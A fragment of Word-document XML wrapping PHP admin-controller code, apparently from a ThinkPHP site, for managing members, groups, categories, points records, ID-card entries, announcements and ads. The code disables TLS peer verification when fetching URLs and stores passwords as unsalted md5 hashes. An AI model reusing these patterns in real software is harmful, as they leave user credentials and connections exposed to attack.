          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C61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F82F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32A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his-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D5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4454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1578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4F2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get($url, $json = false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65988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F2A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ContextOptions = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45764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sl" =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665322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 =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4ED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_name" =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52117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2035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C32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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730572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json) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33019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json_decode($html, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD03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FBF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27CE1C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230C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 $type = '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A285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E2B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rl) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C95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3052CD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B09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57A7F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jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147B9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99C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0152B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5CE69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14E50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30D69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33DF3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15A0A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FF6D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key = md5($url . rand(11111, 999999)) . $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE94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7247A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4241DF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7429C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0F7A5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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D7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672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6F21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html_content($article)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D710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6A2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src=\"(.*?)\"/", $article, $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70064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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4117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 =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B424C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1 = $v;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49706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2 = _imgUrl() . $this-&gt;qiniu($img_1, 'message');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79611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_1 &amp;&amp; $img_2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D63B0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str_replace($img_1, $img_2, $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C7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BF8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AFB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8DEA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mg_width.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367BC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mg_height.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503E6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onerror.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A859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inline.*?)\"(.*?)\"/si", "", $article);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7282D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p.*?)&gt;/si", "&lt;p&gt;", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D4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figure.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742E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lt;(\/?a.*?)&gt;/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF52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data.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665801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width.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59381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alt.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587887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preg_replace("/(style.*?)\"(.*?)\"/si", "", $article); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDB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ticle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156DD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2CAB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6B77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69EE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4901ED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6A135A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038A63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mber extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F288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1C6A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3DA84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config')-&gt;where('type','member')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628A1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name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD65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v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0544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v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24B3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v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A01C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v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193A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2F1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC9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mber_groups=Db::name('member_groups')-&gt;order('jingyan asc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D8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roups2=Db::name('member_groups')-&gt;order('jingyan desc,id desc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9F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_groups',$member_groups);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D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member_groups2',$member_groups2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7783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6FDC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1B135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regmobile'] &amp;&amp; !$post['regemail'] &amp;&amp; !$post['reguser']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D98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用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC1D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70C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55BE41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name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAE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nfig')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10C1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D48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63C5F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DE2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1218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437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C715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1437A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58F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24C6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CE1B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60BC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1C48D6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315F71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nput('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C1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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D5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search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F610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AD3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27988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DF9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not in',0,1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4178D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gt;order('id desc,update_time desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550993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B6D8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65249D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48A8A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82FDB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105D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21DC24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55E81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587A4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FC96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ser'] &amp;&amp; !$post['email'] &amp;&amp; !$post['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F2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账户、手机、邮箱最少填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050944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A65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validate('Member');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2321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post)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCCA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id){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403CBB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password']=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F4D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6F83C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ser']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2C9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b=Db::name('member')-&gt;where('user',$post['user'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227D7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db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D92D2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账户已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D60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62E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B08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password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAD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填写密码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12207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9FF7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2AE93D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insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5E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54AD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224CF9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E05CA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3F31D4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5A9E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122FC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Db::name('member')-&gt;where('id',$id)-&gt;value('password');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA2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password']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA6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password']=$member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7A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C0D0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password']=md5($post['password']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAFD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2AA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where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6779DF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98DA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9B64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655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0A4004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0BB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9BD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1C9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validate-&gt;getError()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21F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F5F7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2157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B912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gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B8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08248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D44D4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4885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CD43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1F05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531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14CBC5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72E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BCA3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D72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roups(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55373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groups')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D543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data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8858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groups');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B83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3B3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0B734F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1BD6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ABC7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AE30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delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316B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8D38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271CB9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41107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C68E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FEFA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1DA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5D04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3EED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289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6C82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604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3882E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6A58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roupsAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE443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C0F35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E794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6EE9F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1FFA9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member_groups')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2D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0AD92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分组名已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAB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D54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jingyan']=='' || $post['jingyan']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D32A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经验值必须填写</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B3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903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groups')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13221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F0CAB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4167F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E31A8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4222A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6327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19A7A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groups')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F2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BCBA7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3EF0A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0AE41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28227D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3D2C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EF2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029A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8F24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groups')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1C1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357E7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name',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCCBA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C0BB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8CED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E50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420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6327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DED8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5292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115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roupsDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528BE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C4469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7956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8BB79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groups')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3655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E878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40D05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33D1D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2AA65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B99B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127A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3FBCA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852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7B6B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832D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CF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423C6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B73BE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udit(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52667D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gt;order('id desc,update_time desc')-&gt;where(['hide'=&gt;2])-&gt;whereOr('hide',3)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD76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B2A14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686D2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3E984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1E71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6827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3BBB1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3B6B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 ? input('id'): '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B8F1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 ? input('type') : '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C18A4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0'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','1'=&gt;'&lt;font color="#1ab394"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;','2'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','3'=&gt;'&lt;font color="#f00"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/font&gt;'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08799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B2C6B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where('id',$id)-&gt;setField('hide',$type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32351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9ACF7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type]];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9463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6B63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删除失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57000A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7998C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8A3EC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ET</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B2B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3819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3526D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提交错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBBD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C33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8391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7AA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ategory(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FC10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category')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66038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et_tree_option($data,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306489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1BF74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7726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10A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ategoryAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAC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3913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member_category')-&gt;where('tid','0')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B53C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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E99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877F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3E939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3ED62C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member_category')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39757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6B277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648F3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A2B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ategory')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51964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CFF23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3302D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FC43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74DA3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379C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213B3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ategory')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA4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40AB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1AF1F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119F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2177F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81E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5E8B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A2B6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input('typeid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA96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4794F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9E7E9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category')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110414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64A3F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015AF2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9094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error('id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1320AC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93D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CCD3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02DA87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39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6BD2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81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categoryDel(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919D7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F715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A015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FE2B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ategory')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278DC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4298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49506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D13D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C9D0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EEA4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BFA4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AB05E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25A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5FB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5169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1F1C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A9898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B150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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30790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input('money') ? input('money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D911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 ? input('type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203A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put('data') ? input('data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FC8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04011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38156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288A8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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661241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57485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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423872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A9AA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5716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records')-&gt;order('id desc,time desc')-&gt;where($where)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0AF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gt;toarray()['data'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DA1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money'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','score'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>','jingyan'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D28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AC204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oney']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60386B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text']=$v['text'].' &lt;b id="data1"&gt;'.$v['data'].'&lt;/b&gt;&lt;b id="data2"&gt;'.$v['money'].'&lt;/b&gt; '.$type[$v['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F819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13D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E40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7D175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b-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2F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042D1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 input('type'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EAA8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55C3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4A3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Del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F5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320A74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61C4E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6F92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FFEE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Db::name('member_records')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE67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4FF73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06EBF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7B29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DE77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3BA97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577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E884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C4F3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7AFB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5B24D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687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245F2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0872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fz(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B250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75CFA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39AC1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nput('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BD0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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D3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search_type]  = $search_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C68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8A85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4E202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7A99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sfz')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516AB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711E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560C8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3AFC4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AC51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C3A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fz_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2686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D031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9AA5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7C09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id']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383F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必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D02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536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7EE94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time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555353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sfz')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3F8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115D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0ED88B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46C78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70661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8C93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7A3461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sfz')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46806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842B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41F6D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D69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274BA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D019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5CC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05D5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8529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sfz')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349D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2E01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19E499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1F19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5D4BC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DB3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159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2EEB2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4AE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609A1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837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fz_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CB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A47A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30C3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7399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sfz')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD8C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8010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A7421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2A4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4D87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EA8F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2CF4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49237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5C2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A81E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66968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0D1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A490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DA3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fz_hide(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424919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09677C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input('hide'); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62293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17223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sfz')-&gt;where('id',$id)-&gt;setField('hide',$hide);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0D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sfz");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFC6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AE95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AE8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onggao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8B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1D5F22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65C28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nput('param.type');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722DE7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 &amp;&amp; $search_type){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DA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search_type]  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B450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8C2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14DF4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95D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gonggao')-&gt;order('id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70099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3B1F9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ata-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462513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176E09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3793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967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onggao_add(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBE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56EAF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25655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52BE4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time'] = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9B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2D87C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gonggao')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E037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5B37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00257E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9858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1E2E9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91F2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0AFF7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gonggao')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C14E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0EF80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3F0FF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1F95B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3646C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4269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C79F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6319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6FA4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gonggao')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B091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262037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D0679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5F5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0C91E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B3A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698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150D18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6A7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A2A6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4E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onggao_del(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C52B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81F9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5F188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C18E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gonggao')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EB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B847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3276C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A6C43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1670B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DA51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9DA4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4CE05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EC7F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8B88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A33A0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98A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17F0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B6E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2FD8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45C67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77EAA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7F8C92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EE85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d extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43196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1057D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0AAFC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d')-&gt;order('id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418E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1AF77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3CC0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D86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4D044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7EC24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9482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F6D87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07E385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3E9294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ad')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B3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1914A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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A60F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AF2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gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78F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87E7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06B5C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622EF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055619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3110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4EB1E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gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A156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2497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1744F7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BC950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0513E3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FBF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91C9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2F48A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A6EA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d')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530862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03A6F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7A477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B8ACE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572148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DC2A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58D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this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417139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C39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CA2F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6B0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0C44B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35521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3E7F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5D5F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d')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
